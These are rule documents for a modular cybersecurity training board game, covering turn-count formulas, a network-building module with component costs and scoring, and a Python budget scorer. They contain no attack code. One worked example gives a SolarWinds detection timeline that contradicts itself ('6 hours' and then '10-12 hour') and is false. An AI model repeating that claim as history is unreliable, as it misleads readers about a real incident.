     - (But challenge them on game 2)

  3. Specific Real-World Incident
     - Teaching historical breach with documented timeline
     - Example: "NotPetya took 4 hours to spread; we're modeling that"
     - Recommend: Adjust to match documented timeline (with explanation)

When NOT to Use (Accept Roll As-Is):

  1. "The roll feels unlucky" → Accept chaos; it's realistic
  2. "I want exactly 10 turns" → Let the dice decide
  3. "The attack chain is long" → That's what TIER system handles
  4. "I miscalculated the TIER" → Reroll from scratch next game
  5. "Players are doing well, so more turns" → Never adjust mid-game

Implementation:

Step 1: Roll d4 (publicly)
Step 2: Calculate result (Tier Base + d4)
Step 3: Announce initial turn count

THEN if genuinely needed:

Step 4: Pause
Step 5: Explain why adjustment is necessary
Step 6: Apply ±1 modification (only ±1, not more)
Step 7: Announce final turn count
Step 8: Document the decision (for consistency in future scenarios)

Example Valid Use of Rule 3:

Setup: "I'm teaching the SolarWinds supply chain attack.
Real timeline was 6 hours to detection.
I have TIER 3 (11-13 turns).
Rolled d4: 2 (no modifier) = 11-13 turns.
Rule 3 lets me adjust by -1 to model
the documented 10-12 hour timeline. Final: 10-12 turns."

Example Invalid Use of Rule 3:

WRONG: "I rolled 8-10 turns but my attack chain is 5 cards.
I want it longer, so I'm adding 2 turns."
CORRECT: Use TIER 3 (11-13) if you want a longer game

WRONG: "Players are doing well, so I'm extending by +2 turns."
CORRECT: No mid-game adjustments; accept the result

WRONG: "I'm just going to ignore the roll and use 10 turns."
CORRECT: Either accept d4 result or reroll from scratch (before game starts)

Choosing Between Systems

Use Default Formula If:

Use Tier + d4 If:

Hybrid Approach: Many TOs use Default Formula for most games, then switch to Tier System for special campaigns or advanced groups.


Implementation Workflow

For Beginners (Default Formula)

1. Design attack chain (pick 3-6 threat cards)
2. Count cards: ___
3. Calculate: (___ × 2) + 1 = ___ turns
4. Announce: "You have ___ turns."
5. Play

Time Investment: 30 seconds

For Advanced (Tier System)

1. Design attack scenario
2. Choose Tier 1-4 based on sophistication (don't announce number)
3. Write down Tier Base (e.g., "TIER 2: 8-10")
4. Roll d4 (publicly or private)
5. Calculate: Base + d4 result = Final turn count
6. [Optional] Apply Rule 3 modification if genuinely needed (rare)
7. Announce final turn count (no tier numbers)
8. Play
9. [After game] Discuss attack sophistication discovered through gameplay

Time Investment: 2-3 minutes


Quick Reference Card (Print & Keep at Table)

═══════════════════════════════════════════════════════════════
              VARIABLE GAME LENGTH SYSTEM v2.1
═══════════════════════════════════════════════════════════════

SYSTEM 1: DEFAULT FORMULA (Beginners)
────────────────────────────────────
Turn Count = (Attack Cards × 2) + 1

3 cards → 7 turns  |  4 cards → 9 turns
5 cards → 11 turns |  6 cards → 13 turns

SYSTEM 2: TIER + d4 (Advanced)
──────────────────────────────
Step 1: Choose Tier (1-4, don't reveal number)
  TIER 1: 5-7 turns (simple)
  TIER 2: 8-10 turns (standard)
  TIER 3: 11-13 turns (advanced)
  TIER 4: 14-16 turns (expert)

Step 2: Roll d4 (-1, 0, 0, or +1)

Step 3: Final Turn = Tier Base + d4 Result

CRITICAL RULES
──────────────
✓ Rule 1: Accept any roll (embrace chaos)
✓ Rule 2: Don't reveal tier (let players discover via gameplay)
✓ Rule 3: Modifier authority ONLY when genuinely needed (rare)

═══════════════════════════════════════════════════════════════

Frequently Asked Questions

Q: Why use (×2) + 1 and not something else? A: Playtesting showed this gives attackers enough time to progress realistically while keeping games from dragging. It's also easy to calculate mentally.

Q: Can I use both systems in the same campaign? A: Yes! Use Default Formula for most games, Tier System for special scenarios.

Q: What if players figure out the formula? A: That's fine. Knowing the formula doesn't give them an advantage (they still don't know how many cards in the chain).

Q: Can I adjust turn count during the game? A: NO. Turn count is set at game start and never changes. Rule 3 modifications happen before game starts only.

Q: What if my attack chain doesn't fit (e.g., 2 cards or 7 cards)? A:
- 2 cards: Use formula anyway (2 × 2 + 1 = 5 turns) or switch to Tier System
- 7+ cards: Use Tier 3-4 instead of formula

Q: How do I explain randomness to new players? A: "Real incident response isn't predictable. Sometimes attackers are faster, sometimes slower. We're rolling to capture that realism."

Q: Should I tell players the turn count? A: YES, always tell them at game start. (The mystery is about attack sophistication, not game length.)

Q: Can I use a d6 or d12 instead of d4? A: Not recommended (changes probability distribution). Stick with d4 or no roll at all.


Evolution & Future

This system was introduced in v2.1 as players requested more realism in game pacing. Future versions may include:

For now, the two-track system (Default + Tier) provides both accessibility and depth.


Design Notes for Future Playtests

Questions to answer through playtesting:

  1. Does Default Formula (×2 + 1) create good pacing for all group types?
  2. Are players satisfied with Tier + d4 variability?
  3. Do the three Critical Rules prevent metagaming effectively?
  4. Should some modules have different formulas (e.g., Forensics longer)?
  5. Is Rule 3 invoked correctly or too often?

Feedback to collect:
- Typical game length vs. expected (from formula)
- Whether turn limits felt realistic
- Whether players felt rushed or bored
- Whether tier-hiding created effective mystery

Report findings to: GitHub Issues - Variable Game Length Feedback


Ready to set game length? Pick your formula and play!

docs/rules/module-network-building.md

Network Building Module: Rules & Mechanics

Version: 2.2 - Playtest Edition
Last Updated: July 2026


Module Overview

The Network Building Module teaches players how to design IT infrastructure under budget constraints, business requirements, and trade-off decisions. This is a pre-game module designed to create the network context for other modules (particularly Incident Response, Hardening, and Disaster Recovery).

Key Concept: Architecture decisions create vulnerabilities that are discovered during investigations and audits. Bad decisions made here cost more money later.

Module Teaches:
- Primary: Network architecture, infrastructure design, security trade-offs
- Secondary: Budget prioritization, business vs. security balance, intentional/accidental vulnerabilities

Integration Point:
- Network Building can be played standalone OR as setup for Incident Response/Hardening/Disaster Recovery modules
- When combined with other modules, the network design created here becomes the context for those modules (see module-combinations.md)


Module Setup (15-20 minutes)

1. Choose Difficulty Level

| Difficulty | Budget | Recommended Use |
|---|---|---|
| Beginner | 60 | Learning networks; roomier budget, easier trade-offs |
| Standard | 50 | Balanced play, typical scenario |
| Advanced | 40 | Tight budget; hard trade-offs, strategic depth |

Budget represents: Time, money, and resources for infrastructure design

(v2.2) More budget = easier. Beginner gets the most budget; Advanced gets the least.

2. Starting Scenario

Narrative Framing:

"Your organization is building or rebuilding its IT infrastructure. You have limited budget and must support 500 employees with core business functions. Every decision will affect your security posture when this network is tested. Make smart trade-offs."

Key Point: Teams don't know yet which decisions will matter most. Some budget is "wasted" on nice-to-haves, some on security that (hopefully) won't be needed.

3. Available Network Components

Components fall into 5 categories:

Category 1: Server Types

| Server Type | Cost | Capacity | Function | Security Notes |
|---|---|---|---|---|
| Email Server | 8 | 1 | Email system | Internet-facing; phishing target |
| Web Server | 7 | 1 | Public website | Internet-facing; exploit target |
| Database Server | 10 | 1 | Customer data | High-value target; access control critical |
| File Server | 6 | 2 | File storage | Often over-privileged; lateral movement point |
| Domain Controller | 12 | 2 | User identity (AD/Kerberos) | Critical; full compromise if breached |
| Development Server | 5 | 3 | Dev/testing environment | Weak security; staging ground for attacks |
| Backup Server | 9 | 1 | Data backup | Should be isolated; ransomware recovery |
| Cloud Workload | 4 | 2 | General cloud compute | Less control; API/credential exposure |
| Legacy System | 3 | 1 | Old/unmaintained system | High exploitability; hard to patch |
| Honeypot Decoy | 7 | 1 | Detection trap | Detects attackers; wastes attacker time |

Capacity Rules:
- Each server can host a certain number of services (shown in Capacity column)
- Services = business functions (email, web, database, identity, file storage, etc.)
- Can OVERLOAD a server (put more services than capacity allows) to save budget, but creates risk

Category 2: Security Devices

| Device Type | Cost | Function | Gameplay Effect |
|---|---|---|---|
| Firewall | 12 | Perimeter defense | Blocks traffic between network zones |
| Intrusion Detection (IDS) | 10 | Network monitoring | Detects lateral movement (+1 investigation modifier in IR) |
| Intrusion Prevention (IPS) | 14 | Network blocking | Blocks exploits passively |
| Load Balancer | 8 | Traffic distribution | Improves availability without extra capacity |
| VPN Gateway | 9 | Remote access | Enables secure remote work; attack surface if weak |
| Email Gateway | 6 | Email filtering | Stops phishing; reduces SOCIAL_ENGINEERING risk |
| Web Application Firewall (WAF) | 11 | App-level defense | Protects web servers from app attacks |
| Network Segmentation Switch | 10 | Microsegmentation | Creates isolated network zones |
| SIEM System | 15 | Centralized logging | Logs everything; helps IR investigations (+1 to Investigate in IR module) |
| Honeypot Network | 8 | Detection | Detects lateral movement; wastes attacker time |

Category 3: Network Architecture Decisions

How servers are logically organized and connected:

| Decision | Cost | Security Impact | Notes |
|---|---|---|---|
| Flat Network | 0 | No segmentation | All servers on same network; vulnerable but simple |
| Segmented Network (3 zones) | 5 | Basic isolation | Separate DMZ, Internal, Sensitive zones |
| Fully Isolated (multiple firewalls) | 12 | Strong isolation | Each zone protected; expensive but resilient |
| Cloud Hybrid (on-prem + cloud) | 8 | Complex | Adds cloud security considerations |
| Cloud First (mostly cloud) | 6 | Different attack surface | Less on-prem; more cloud API risk |

Architecture decisions are NON-NEGOTIABLE - teams must pick one to organize their network.

Category 4: Business Requirements (v2.2)

Teams MUST satisfy every Required item by end of game. Recommended items are not mandatory, but skipping one is recorded as a gap (and costs points at scoring).

| Requirement | Status | Satisfied By | Notes |
|---|---|---|---|
| Email | Required | Email Server, OR hosted on a Cloud Workload | Non-negotiable |
| Web Presence | Required | Web Server, OR hosted on a Cloud Workload | Online business |
| Customer Database | Required | Database Server, OR hosted on a Cloud Workload | Cloud-hosting the crown jewels is a recorded risk |
| User Identity (AD/Kerberos) | Required | Domain Controller | No substitute |
| Disaster Recovery (Backup) | Required (v2.2) | Backup Server | No backup = automatic FAIL on this requirement, recorded as a CRITICAL gap (not an instant game loss) |
| File Storage | Recommended (v2.2) | File Server, OR spare capacity/overload on another server | Gap if missing |
| Development/Testing | Recommended (v2.2) | Dev Server, OR overload another server | Overloading a server for dev is explicitly allowed |
| Remote Work VPN | Recommended (v2.2) | VPN Gateway | Gap if missing: risky remote-access workarounds |

Key Rule: Required items are fixed. Teams must find places to host them, even if it means cloud-hosting or overloading servers.

Affordability Check (v2.2) — the Required list fits every difficulty (costs from the Category 1 table):
- Dedicated build: Email Server 8 + Web Server 7 + Database Server 10 + Domain Controller 12 + Backup Server 9 = 46 (fits Standard and Beginner; exceeds the Advanced budget of 40)
- Cloud-assisted build: Cloud Workload 4 (Email + Web, 2/2) + Database Server 10 + Domain Controller 12 + Backup Server 9 = 35 (fits Advanced)
- Fully cloud-assisted build: Cloud Workload 4 (Email + Web) + Cloud Workload 4 (Database, a recorded risk) + Domain Controller 12 + Backup Server 9 = 29 (fits Advanced with room for devices)

Category 5: Hosting Model

Physical location of infrastructure:

| Model | Cost | Notes |
|---|---|---|
| Self-Hosted (On-Premises) | 0 | Team controls; responsibility for patching |
| Cloud-Hosted (AWS/Azure/GCP) | 0 | Provider controls; less direct control |
| Hybrid | 0 | Mix of on-prem and cloud; complex |

Gameplay Loop (15-20 minutes)

Turn Structure (v2.2)

Teams take 5 "Build Turns" (~3-4 minutes each to discuss and decide).

Each turn is a design-review phase (v2.2): the team may take any number of actions — place as many components as they can afford — before ending the turn. Turns are not a one-purchase limit; they are checkpoints where the design gets stress-tested.

Between turns, the Threat Orchestrator reveals a development: draw one Operational Event or Business Requirement card from the standalone decks (cards/network-building/standalone/), or narrate one (a stakeholder demand, a vendor issue, a budget change). This gives teams a reason to revisit the design each turn.

Available actions:

Action 1: Place a Server

Cost: Server cost (3-12 Budget)
Effect: Add server to infrastructure

How It Works:
  1. Choose a server card
  2. Decide which business services it will host
  3. Pay the cost
  4. Track remaining budget

Example: "We're placing a Domain Controller on-premises (12 Budget). It will host user identity, with a spare capacity slot for file storage. Remaining budget: 38."

Constraints:
- Duplicates allowed (v2.2): you may deploy more than one server of the same type; each copy costs full price
- Can't host a required service on a server that doesn't exist
- Can OVERLOAD servers (see Overload Mechanic below)


Action 2: Add Security Device

Cost: Device cost (6-15 Budget)
Effect: Add network defense or monitoring

How It Works:
  1. Choose a security device card
  2. Describe which servers/zones it protects
  3. Pay the cost
  4. Track placement on network diagram

Example Turn: "We're deploying a Firewall between our DMZ and Internal network (12 Budget). This blocks unauthorized traffic between zones. Remaining budget: 26."


Action 3: Implement Network Architecture

Cost: Architecture cost (0-12 Budget)
Effect: Determine how servers logically connect

How It Works:
  1. Choose one architecture type (only ONE per game)
  2. Describe zone organization
  3. Pay the cost
  4. Document on network diagram

Example Turn: "We're implementing a Segmented Network with 3 zones (5 Budget):
- DMZ: Email and Web servers (internet-facing)
- Internal: File servers and user workstations
- Sensitive: Database and Domain Controller
Remaining budget: 21."


Action 4: Choose Hosting Model

Cost: Usually 0 (some cloud strategies cost money)
Effect: Determines where infrastructure physically lives

How It Works:
  1. Decide on hosting strategy
  2. Apply to appropriate servers
  3. Document on infrastructure card
  4. Pay if cloud-specific (usually free)

Example Turn: "We're hosting our email and web servers on AWS (0 cost). Domain Controller stays on-premises. This reduces on-prem complexity but adds cloud management responsibility."


Action 5: End Turn / Pass

Cost: 0
Effect: Take no further actions this turn; preserve budget

Use When: Satisfied with current design or holding budget in reserve for surprises


The Overload Mechanic

Strategic Tradeoff: Cost vs. Risk

Problem: Limited budget + mandatory services = imperfect solutions

Solution: Overload servers (put more services on one server than intended)

How It Works (v2.2):
- If a server has capacity for 2 services, you can put 3+ on it
- Cost: +1 Budget per extra service beyond capacity (paid when the service is added)
- Benefit: Still far cheaper than buying another server
- Risk: Overloaded server is harder to isolate; compromise affects multiple services

Example Scenario: "Budget remaining: 5. Still need to host Development Services.

Option A: Buy Dev Server for 5 (leaves 0 budget)
Option B: Put Dev on our File Server, which already hosts File Storage and Email Backup (2/2). Overload by 1: pay 1 Budget (leaves 4)

We choose B: File Server becomes (File Storage, Email Backup, Dev Services — OVERLOADED 3/2)"

Consequences (Discovered Later):
- Overloaded servers are easier to pivot from (when other modules investigate)
- If one service is compromised, ALL services on that server are at risk
- Recovery is harder (can't isolate just the compromised service)


Vulnerability Gaps (Intentional and Accidental)

How Budget Constraints Create Gaps

Teams inevitably leave security gaps:

| Gap Type | How It Happens | Cost Saved | Later Consequence |
|---|---|---|---|
| No Segmentation | Too expensive (5-12) | 5-12 | All servers accessible after initial compromise |
| No Firewall | Too expensive (12) | 12 | Can't enforce zone boundaries |
| Legacy Systems | Cheap (3) | 7+ | Easy to exploit; unpatched vulnerabilities |
| Overloaded Servers | Budget pressure | 2-11 (server cost minus overload fees) | Multi-service compromise; hard to isolate |
| No Detection (no IDS/SIEM) | Expensive (10-15) | 10-15 | Attacks undetected; investigations harder |
| No Email Gateway | Phishing defense (6) | 6 | Phishing easier in IR module |
| No Honeypot | Luxury item (7) | 7 | Attackers move silently |
| All Cloud or All On-Prem | Simplicity | 0 | Security model doesn't fit actual architecture |
| No Backup Server | Expensive (9) | 9 | Automatic FAIL on the Disaster Recovery requirement |
| No SIEM | Most expensive (15) | 15 | Investigation takes longer |

Key Insight: These gaps are discovered when other modules test the network (Audit, Incident Response, Disaster Recovery).


Final Infrastructure Summary

After Building Complete

Teams create an Infrastructure Summary Card:

YOUR NETWORK ARCHITECTURE (Standard, 50 Budget)

SERVERS DEPLOYED:
- Cloud Workload (AWS) - Hosts: Email + Web (2/2, cloud-hosted)
- Database Server (On-Prem) - Hosts: Customer Database
- Domain Controller (On-Prem) - Hosts: Identity, File Storage,
  Dev Services (OVERLOADED 3/2, +1 Budget paid)
- Backup Server (On-Prem, isolated) - Hosts: Backups / DR

ARCHITECTURE: Segmented (3 zones)
- DMZ: (cloud workload fronts the internet)
- Internal: Users
- Sensitive: Database, Domain Controller, Backup Server

SECURITY DEVICES:
- Email Gateway (incoming mail)
- NO Firewall, NO IDS/SIEM, NO VPN Gateway, NO Honeypot

HOSTING: Hybrid (cloud front end, on-prem crown jewels)

BUDGET SPENT: 47/50 (3 remaining)
- Cloud Workload 4 + Database 10 + Domain Controller 12 + Backup 9
  + Segmented Architecture 5 + Email Gateway 6 + Overload 1 = 47

IDENTIFIED GAPS (for other modules):
- Overloaded Domain Controller (identity + files + dev on one box)
- No IDS/SIEM (attacks undetected; investigations harder)
- No VPN Gateway (remote workers use risky workarounds)
- Email and Web share one cloud workload (single point of failure)

Scoring & Network Assessment

Infrastructure Quality Score (v2.2)

After building, teams receive a score reflecting their design choices:

| Metric | Score |
|---|---|
| Requirements | +2 per Required item satisfied (Email, Web, Database, Identity, Backup) — max +10 |
| Segmentation | Implemented Segmented or Fully Isolated architecture = +10 |
| Detection | Deployed IDS, IPS, or SIEM = +5 |
| Recovery | Deployed Backup Server = +5 |
| Redundancy | Duplicated a critical server or deployed a Load Balancer = +5 |
| Contingency Reserve | 5-15 Budget remaining = +5; 1-4 remaining = +2; 0 or 16+ remaining = 0 |

Maximum: 40 points. The reserve bonus rewards smart utilization — meet the requirements and keep a small cushion; hoarding budget scores nothing.

Example Scoring (the sample network above, Standard 50):
- All 5 Required items satisfied: +10
- Segmentation implemented: +10
- No IDS/IPS/SIEM: 0
- Backup Server deployed: +5
- No redundancy: 0
- 3 Budget remaining: +2
- Total: 27 points — Good design

Interpretation Tiers (v2.2):
- 32-40 points: Enterprise-grade design; comprehensive protection
- 22-31 points: Good design; most critical gaps covered
- 12-21 points: Adequate design; some gaps remain
- Below 12 points: High risk; many gaps; future modules will be challenging

Reachability check: at Beginner (60), a team can score the full 40 — e.g., Cloud Workload 4 (Email+Web) + Database 10 + Domain Controller 12 (Identity + File) + Backup 9 + Segmented 5 + IDS 10 + second Cloud Workload 4 (redundant web) = 54 spent, 6 remaining → 10+10+5+5+5+5 = 40.
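The budget arithmetic and the Infrastructure Quality Score above can be checked mechanically, which is useful when a TO wants to verify a team's summary card at the table. The following Python scorer is an added example, not part of the Incident Zero rules or the RetroVerse Studios project: it encodes the cost tables and scoring bands from this module and reproduces both the sample network (47/50 spent, 27 points) and the Beginner reachability build (54/60 spent, 40 points). The `Design`/`Placement` data model and the short service names (`"Email"`, `"Identity"`, ...) are assumptions made for the example; for the Redundancy metric it treats any duplicated server type as redundancy, a simplification of the rule's "critical server" wording.

```python
"""Budget and Infrastructure Quality Score checker for the Network Building
module. Added illustration, not part of the Incident Zero rules; costs,
capacities and scoring bands are copied from this module's tables. The
Design/Placement model and the service names are assumptions."""

from dataclasses import dataclass

# Category 1: server cost and service capacity
SERVERS = {
    "Email Server": (8, 1), "Web Server": (7, 1), "Database Server": (10, 1),
    "File Server": (6, 2), "Domain Controller": (12, 2), "Development Server": (5, 3),
    "Backup Server": (9, 1), "Cloud Workload": (4, 2), "Legacy System": (3, 1),
    "Honeypot Decoy": (7, 1),
}
# Category 2: security device cost
DEVICES = {
    "Firewall": 12, "IDS": 10, "IPS": 14, "Load Balancer": 8, "VPN Gateway": 9,
    "Email Gateway": 6, "WAF": 11, "Segmentation Switch": 10, "SIEM": 15,
    "Honeypot Network": 8,
}
# Category 3: architecture cost (exactly one per game)
ARCHITECTURES = {"Flat": 0, "Segmented": 5, "Fully Isolated": 12, "Cloud Hybrid": 8, "Cloud First": 6}
# Category 4: Required items and the server types allowed to host each one
REQUIRED = {
    "Email": {"Email Server", "Cloud Workload"}, "Web": {"Web Server", "Cloud Workload"},
    "Database": {"Database Server", "Cloud Workload"}, "Identity": {"Domain Controller"},
    "Backup": {"Backup Server"},
}


@dataclass
class Placement:
    server: str      # key of SERVERS
    services: list   # service names hosted on this box


@dataclass
class Design:
    budget: int        # 60 / 50 / 40 by difficulty
    servers: list      # Placement objects
    devices: list      # keys of DEVICES
    architecture: str  # key of ARCHITECTURES


def spend(design):
    """Total Budget spent: servers, +1 per service beyond capacity, devices, architecture."""
    total = ARCHITECTURES[design.architecture]
    for p in design.servers:
        cost, capacity = SERVERS[p.server]
        total += cost + max(0, len(p.services) - capacity)   # overload fee
    return total + sum(DEVICES[d] for d in design.devices)


def satisfied_requirements(design):
    """Required items hosted on a server type the requirements table allows."""
    return {name for name, allowed in REQUIRED.items()
            if any(p.server in allowed and name in p.services for p in design.servers)}


def tier(total):
    """v2.2 interpretation bands."""
    for floor, label in ((32, "Enterprise-grade"), (22, "Good"), (12, "Adequate")):
        if total >= floor:
            return label
    return "High risk"


def score(design):
    """Infrastructure Quality Score (max 40) plus the budget bookkeeping behind it."""
    spent = spend(design)
    remaining = design.budget - spent
    if remaining < 0:
        raise ValueError(f"design is over budget by {-remaining}")
    met = satisfied_requirements(design)
    types = [p.server for p in design.servers]
    points = {
        "requirements": 2 * len(met),
        "segmentation": 10 if design.architecture in ("Segmented", "Fully Isolated") else 0,
        "detection": 5 if any(d in ("IDS", "IPS", "SIEM") for d in design.devices) else 0,
        "recovery": 5 if "Backup Server" in types else 0,
        # Simplification: any duplicated server type counts as redundancy
        "redundancy": 5 if len(types) != len(set(types)) or "Load Balancer" in design.devices else 0,
        "reserve": 5 if 5 <= remaining <= 15 else (2 if 1 <= remaining <= 4 else 0),
    }
    total = sum(points.values())
    return {"spent": spent, "remaining": remaining, "missing": sorted(set(REQUIRED) - met),
            "overloaded": [p.server for p in design.servers if len(p.services) > SERVERS[p.server][1]],
            "points": points, "total": total, "tier": tier(total)}


# The module's sample Infrastructure Summary (Standard, 50 Budget)
SAMPLE_NETWORK = Design(50, [
    Placement("Cloud Workload", ["Email", "Web"]), Placement("Database Server", ["Database"]),
    Placement("Domain Controller", ["Identity", "File Storage", "Dev"]),   # 3/2 overload
    Placement("Backup Server", ["Backup"])], ["Email Gateway"], "Segmented")

# The Beginner (60) reachability build that scores the full 40
MAX_NETWORK = Design(60, [
    Placement("Cloud Workload", ["Email", "Web"]), Placement("Database Server", ["Database"]),
    Placement("Domain Controller", ["Identity", "File Storage"]), Placement("Backup Server", ["Backup"]),
    Placement("Cloud Workload", ["Web"])], ["IDS"], "Segmented")   # second workload = redundant web
```

Calling `score(SAMPLE_NETWORK)` returns the summary card's 47 spent / 3 remaining with a 27-point "Good" result and flags the Domain Controller as overloaded; `score(MAX_NETWORK)` returns 54 spent / 6 remaining and 40 points. A design that omits the Backup Server shows `"Backup"` under `missing`, which is the CRITICAL gap the requirements table describes.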

Gap Registry

For use in Incident Response and Audit modules:
- List all identified gaps
- Note severity (CRITICAL, HIGH, MEDIUM, LOW)
- These gaps become modifiers when other modules test the network


Integration with Other Modules

Using Network Building as Context

When Network Building leads to other modules:

→ Incident Response Module:
- Network design determines which attacks are possible
- Overloaded servers make lateral movement easier
- Missing IDS/SIEM makes investigation harder

→ Hardening Module:
- Teams can see which network gaps they should fix
- Fixing a gap they identified = +2 bonus to that defense

→ Disaster Recovery Module:
- Network gaps increase crisis budget costs
- Overloaded servers = more data compromised
- No backup = no recovery option

→ Audit & Compliance Module:
- Pre-built network is audited against NIST/CIS
- Audit findings highlight network gaps
- Findings become modifiers in Incident Response


Tips for Threat Orchestrators

Before the Game

  1. Clarify business requirements - Teams must provide email, web, database, identity, and backup (file storage, dev, and VPN are recommended)
  2. Show budget constraints - 50 Budget is tight; teams will make difficult choices
  3. Emphasize consequences - Choices made here affect all future modules
  4. Prepare Infrastructure Card template - For documenting final network

During Gameplay

  1. Ask clarifying questions - "Why are you putting those two services together?"
  2. Point out overloads - Track when servers exceed capacity
  3. Keep budget visible - Announce remaining budget after each action
  4. Suggest trade-offs - Help teams think through cost-benefit decisions

After Building Complete

  1. Document gaps - List all identified vulnerabilities
  2. Score the network - Tell them how good/risky their design is
  3. Prepare for next module - If continuing to Audit or IR, this network is the context
  4. Celebrate trade-offs - "You saved budget on IPS, but web exploits will be riskier"

Sample Scenarios

Scenario 1: "Startup Network" (Advanced, 40 Budget)

Constraint: Very limited budget; must make hard choices

Starting Narrative: "You're a startup with limited funding. You need to build infrastructure but can't afford everything. Choose wisely."

Likely Outcome:
- Flat network (save 5)
- Few security devices
- Multiple overloaded servers
- High vulnerability; good learning about consequences


Scenario 2: "Mid-Market Expansion" (Standard, 50 Budget)

Constraint: Moderate budget; can afford some security

Starting Narrative: "Your organization is growing. You have some budget for infrastructure but not unlimited. Balance growth with security."

Likely Outcome:
- Segmented network
- Basic security devices (firewall, email gateway, IDS or SIEM)
- Some overloading but manageable
- Moderate vulnerability; balanced design


Scenario 3: "Enterprise Hardening" (Beginner, 60 Budget)

Constraint: Good budget; comprehensive design possible

Starting Narrative: "You're rebuilding infrastructure with sufficient budget. Design for security AND resilience."

Likely Outcome:
- Segmented or isolated network
- Multiple security devices
- Minimal overloading
- Good security posture; few gaps


Extensions & Variations

Variation 1: Regulatory Compliance

Add compliance requirements:
- NIST CSF, CIS Controls, PCI-DSS, HIPAA
- Teams must choose devices that satisfy compliance
- Some devices count toward multiple requirements


Variation 2: Business Department Negotiation

Assign roles:
- Finance wants cheap solutions
- Operations wants reliability
- Security wants defense-in-depth
- Teams must negotiate trade-offs


Variation 3: Network Redesign

After Incident Response or Disaster Recovery:
- Teams rebuild network based on lessons learned
- Compare new design to original
- Measure improvement


Quick Reference: Component Costs

| Component | Cost | Notes |
|---|---|---|
| Servers | 3-12 | Higher cost = more critical function |
| Devices | 6-15 | Higher cost = more capability |
| Architecture | 0-12 | One per game; segmented is best balance |
| Hosting | 0-8 | Usually free; some cloud options cost |

Need Help?


v2.2 Playtest Edition Changes

Summary of rule changes for playtesters (all labelled "(v2.2)" in the text above):

  1. Difficulty direction fixed: more budget = easier. Beginner 60 / Standard 50 / Advanced 40 (previously Beginner had the least budget).
  2. Action economy fixed: each Build Turn, teams may place any number of components they can afford. Turns are design-review checkpoints; between turns the TO reveals an Operational Event or Business Requirement (see the standalone decks in cards/network-building/standalone/). Previously 5 turns × 1 action made the mandatory requirements physically impossible to place.
  3. Requirement list rebalanced: Required = Email, Web, Database, Identity, Disaster Recovery (Backup). Recommended = File Storage, Development, Remote Work VPN. Backup is now Required (missing backup = automatic FAIL on that requirement, not an instant game loss). Development is Recommended and may be hosted by overloading. Email/Web/Database may be cloud-hosted on Cloud Workloads, which keeps the Required list affordable even at Advanced (40): dedicated build = 46; cloud-assisted builds = 35 or 29.
  4. Overload now costs +1 Budget per extra service beyond capacity (was free). Matches the standalone game.
  5. Duplication rule: multiple servers of the same type are allowed; each costs full price (replaces the old vacuous "unless you have the budget for both" wording).
  6. Scoring rescaled: new Requirements metric (+2 each, max 10), Contingency Reserve bonus (+5 for finishing with 5-15 Budget — smart utilization, not hoarding), and tiers rescaled to reachable bands (32-40 / 22-31 / 12-21 / <12). Max score 40 is verified reachable at Beginner.
  7. Terminology unified: "VPN Gateway" (was VPN Concentrator) and "Backup Server" (was Backup System) everywhere.
  8. Examples corrected: the sample Infrastructure Summary and all in-text budget arithmetic now add up.

Network Building Module - Rules & Mechanics
Part of Incident Zero, a modular cybersecurity board game
v2.2 - Playtest Edition

docs/standalone-games/network-building.md

Incident Zero: Network Building Standalone Mini-Game

Infrastructure Design Competition

Version: 2.2 - Playtest Edition
Last Updated: July 2026


Overview

Network Building Standalone is a 30-45 minute competitive resource management game where teams design IT infrastructure under budget constraints with random business requirements and operational challenges.

Core Concept: - Budget: Limited funding (40-60 Network Budget tokens by difficulty; 50 standard) - Requirements: Random business needs forcing tough trade-offs - Randomness: Equipment failures, budget surprises, requirement changes - Scoring: Multi-dimensional (security, budget efficiency, capability, resilience) - Winner: Team with highest final score

Best For:
  - Teaching infrastructure trade-offs
  - Understanding security budget constraints
  - Decision-making under uncertainty
  - Standalone 30-45 minute session
  - Competitive team play (2-4 teams)


Win Condition & Game Length

Turns & Time

Game Duration: 5-7 turns (by difficulty) × 4-5 minutes per turn = 20-30 minutes gameplay
  - Setup: 5 minutes (explain rules, distribute materials)
  - Gameplay: 20-30 minutes
  - Scoring & Debrief: 5-10 minutes
  - Total: 30-45 minutes

Each turn represents ~1 quarter of the fiscal year:
  - Reveal a Business Requirement (what does the business need this quarter?)
  - Reveal an Operational Event (failure, budget change, attack, opportunity)
  - Team deploys components, handles the event, or passes


Game Components

Network Budget Tokens

Component Cards

SERVER CARDS (print from cards/network-building/core-deck/server-cards.md)

Each has: Type, Cost, Capacity, Security Profile

┌──────────────────────┐
│ EMAIL SERVER         │
│ Cost: 8              │
│ Capacity: 1 service  │
│ Security: Low        │
│ (Phishing target)    │
└──────────────────────┘

Server Types Available:
  - Email Server (8 Budget, 1 capacity, Low security)
  - Web Server (7 Budget, 1 capacity, Low security)
  - Database Server (10 Budget, 1 capacity, Medium security)
  - File Server (6 Budget, 2 capacity, Low security)
  - Domain Controller (12 Budget, 2 capacity, Medium security)
  - Development Server (5 Budget, 3 capacity, Low security)
  - Backup Server (9 Budget, 1 capacity, High security)
  - Cloud Workload (4 Budget, 2 capacity, Medium security)
  - Legacy System (3 Budget, 1 capacity, Very Low security)
  - Honeypot Decoy (7 Budget, 1 capacity, Medium security)

Overload rule: a server may host more services than its capacity for +1 Budget per extra service — but overloaded servers are a recorded risk (see Variations, now a standard rule).

SECURITY DEVICE CARDS (print from cards/network-building/core-deck/security-device-cards.md)

Each has: Type, Cost, Benefit

┌──────────────────────┐
│ FIREWALL             │
│ Cost: 12             │
│ Blocks traffic       │
│ between network      │
│ zones (segmentation) │
└──────────────────────┘

Security Device Types Available (v2.2 — benefits stated in plain language; the Scoring section says what each counts as):
  - Firewall (12 Budget) — blocks traffic between network zones; counts as Firewall and toward segmentation
  - IDS (10 Budget) — spots attacks in progress; counts as detection
  - IPS (14 Budget) — blocks known exploits in real time; counts as detection
  - Email Gateway (6 Budget) — filters phishing and email malware
  - WAF (11 Budget) — protects web applications from injection/XSS attacks
  - SIEM (15 Budget) — central logging and alerting; counts as detection, helps audits
  - Network Segmentation Switch (10 Budget) — isolates network zones; counts as segmentation
  - VPN Gateway (9 Budget) — secure remote access for staff
  - Load Balancer (8 Budget) — spreads load across duplicated services; counts as redundancy
  - Honeypot Network (8 Budget) — decoy segment that exposes intruders; counts as detection

BUSINESS REQUIREMENT CARDS (print from cards/network-building/standalone/business-requirement-cards.md)

20 cards (REQ-01 to REQ-20) of random quarterly business needs. Each names the requirement, what satisfies it, and the score impact.

┌──────────────────────┐
│ BUSINESS REQUIREMENT │
├──────────────────────┤
│ REQ-01: "New Product │
│ Launch Website"      │
